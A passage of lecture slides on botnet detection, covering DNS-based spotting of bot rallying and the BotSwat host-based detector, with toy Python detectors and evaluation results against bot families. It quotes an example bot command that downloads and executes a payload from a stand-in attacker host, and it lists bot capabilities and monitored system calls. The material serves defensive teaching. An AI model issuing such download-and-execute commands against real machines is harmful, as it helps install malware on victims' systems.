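    print(c.report("10.0.0.5", "E2", "192.0.2.1", now=1.0))   # inbound exploit
    print(c.report("10.0.0.5", "E3", "192.0.2.1", now=2.0))   # egg download
```

With these weights, E1 and E2 together reach only 0.50, so external stimulus alone never crosses the threshold; any two of E3, E4, E5 do.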
Botnets network traffic patterns
Unique characteristic: “rallying”
  Bots spread like worms and trojans
  Payloads may be common backdoors
  Centralized control of botnet is characteristic feature
Georgia Tech idea: DNS
  Bots installed at network edge
  IP addresses may vary, use Dynamic DNS
  Bots talk to controller, make DDNS lookup
    Pattern of DDNS lookup is easy to spot for common botnets!
David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard, Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)
BotSwat
Host-based bot detection
Based on idea of remote control commands
What does remote control look like?
http.execute
Invoke system calls:
  connect, network send and recv, create file, write file, …
On arguments received over the network:
  IP to connect to, object to request, file name, …
Botswat premise
  We can distinguish the behavior of bots from that of innocuous processes via detecting “remote control”
  We can approximate “remote control” as “using data received over the network in a system call argument”
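The premise can be illustrated with a toy detector that remembers data received from the network and flags any monitored call whose argument appears verbatim in that data. This is a content-matching approximation written for illustration, with hypothetical names; it is not BotSwat's tainting module, which interposes on library calls and propagates taint through memory copies.

```python
class RemoteControlDetector:
    """Flag calls whose string arguments were received over the network."""

    def __init__(self, min_len=4):
        self.min_len = min_len   # ignore very short arguments to limit noise
        self.received = []       # buffers seen by recv-like calls

    def on_recv(self, data):
        """Record data that arrived over the network (a taint source)."""
        self.received.append(data)

    def is_tainted(self, arg):
        if len(arg) < self.min_len:
            return False
        return any(arg in buf for buf in self.received)

    def check_call(self, name, args):
        """Return (name, tainted_args) if any argument is tainted, else None."""
        tainted = [a for a in args if isinstance(a, str) and self.is_tainted(a)]
        return (name, tainted) if tainted else None


if __name__ == "__main__":
    d = RemoteControlDetector()
    d.on_recv(r"http.execute www.badguy.com/malware.exe C:\WIN\bad.exe")
    print(d.check_call("connect", ["www.badguy.com"]))
    print(d.check_call("connect", ["www.example.org"]))
```

The first call is flagged because its argument came from the command just received; the second is not, since that host name never arrived over the network.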
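Example: agobot on Windows XP receives the command
  http.execute www.badguy.com/malware.exe C:\WIN\bad.exe
over the NIC and then calls:
  connect(…, www.badguy.com, …)
  send(…, “… GET /malware.exe …”, …)
  fcreate(…, “C:\WIN\malware.exe”, …)
[Figure: numbered steps 1 through 8 trace the command from the NIC through agobot to these calls.]
[Figure: BotSwat sits between SOURCES and SINKS; sinks shown: bind(…), CreateProcessA(…), NtCreateFile(…), ...]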
BotSwat architecture: overview
Interposition mechanism (detours)
  Interposes on API calls
Tainting module
  Instantiates and propagates taint
User-input module
  Tracks local user input as received via KB or mouse (“clean” data); propagates cleanliness
Behavior checking
  Monitors invocations of selected system calls
  Queries tainting and user-input modules
  Determines whether to flag invocation
~70k lines C++ and ~2200 intercepted fxns
Library-call level tainting
Intercept calls made by process via a DLL to memory-copying functions
  If C library functions statically linked in (STAT), we won’t see run time calls to these functions
Handling visibility limitations
  Taint a mem region on basis of its contents
  Keep track of data received over the network
Taint propagation modes:
  Cause-and-Effect (C&E) – conservative
  Correlative (CORR) – liberal
User input tracking
Goal: Identify actions initiated by local app user
Challenge: data value associated with mouse input is heavily application-defined; not exposed via API call or similar
Solution: consider all data values referred to by app while it is handling mouse input event clean (an over-approximation)
Figure out when app is handling input event
  System creates message M (Target Window: W; Input Type: LMB click; Location)
  Messages M1, M2, M3 wait in the queue; app retrieves them with GetMessage(...) and routes them with DispatchMessage(...)
  App executes code to handle event:
    MainWndProc(…, UINT uMsg, …) { switch (uMsg) { case WM_LBUTTONDOWN: ... } ... }
Behaviors and gates
Behaviors
  tainted open file, tainted create file, tainted prog exec, ...
  bind tainted IP, bind tainted port, ...
  tainted send, derived send, sendto tainted IP, sendto tainted port
Gates
  NtOpenFile, NtCreateFile
  NtDeviceIoControlFile
  …
Sinks
  MoveFile{Ex}{A,W}, Win32DeleteFile, MoveFileWithProgress{Ex}{A,W}, DeleteFile{A,W}, ReplaceFile{A,W}, CreateFile{A,W}, OpenFile, CopyFile{Ex}{A,W}, fopen, _open, _lopen, _lcreat, ...
  bind, send, sendto, WSASend, WSASendTo, SSL_write, …
Selection of behaviors/gates/sinks: informed by bot capabilities
Evaluation of BotSwat
Bots: ago, DSNX, evil, G-SyS, sd, Spy
Two test scenarios
  C library functions dynamically or statically linked
Many bot variants
  Apply xforms (compr, encr) to bot binary
  Minor source edits (C&C params, config data)
  Variants from ago, sd, & Spy families: 98.2% of all bots seen in wild (’05)
Eight benign programs
  web browser; clients: email, ftp, ssh, chat, AV signature updater; IRC server
  Chosen as likely to exhibit behavior similar to bots
Results – overview
Detected execution of most candidate cmds
Detected vast majority of bots’ remote control behavior – even when couldn’t see bots’ calls to memory-copying functions
  # behaviors exhibited: 207
  # behavs detected (DYN, C&E): 196
  # behavs detected (STAT, CORR): 148
Tested 8 benign progs; not many FPs
  Under CORR: 8 behaviors; 5 different
Detected commands
capability: port redirect; other proxy; web download; DNS resolution; UDP/ping floods; oth DDoS floods; scan/spread; spam; visit URL
ago, DSNX, evil, G-SyS, sd: √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √
Spy: √ √ √ √
capability: kill process; open/exec file; keylogging; create dir; delete file/dir; list dir; move file/dir; DCC send file; act as http svr; change C&C svr; create clone; clone attacks; create spy
ago, DSNX, evil, G-SyS, sd: √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √ √
Spy: √ √ √ √ √ √ √ √ √ √
Spybot (DYN, C&E)
[Figures: detection traces for the execute and scan commands]
Botswat – summary
Proof of concept
  Single behavior – remote control – detects most malicious bot actions
  Resilient to differences that distinguish variants (and even families)
  Works against bots not used in design of method
  Independent of command and control protocol, botnet structure
  Low false positive rate; can handle with whitelist or other methods
Significant limitations
  Interposition at library call level
  Some bots in wild may allow only low-level system call tracking
Need to decide when to raise an alarm
  Correlate low-level system events to identify high-level bot commands
  Experiment with alarm thresholds
Develop malware analysis tool to produce characterization of bot actions
  Instruction-level tainting for developing malspecs, evaluating detection results
Efficient run-time monitor of selected applications in production environment
  Which processes should be monitored?
  How to collect, aggregate, process, and report information efficiently?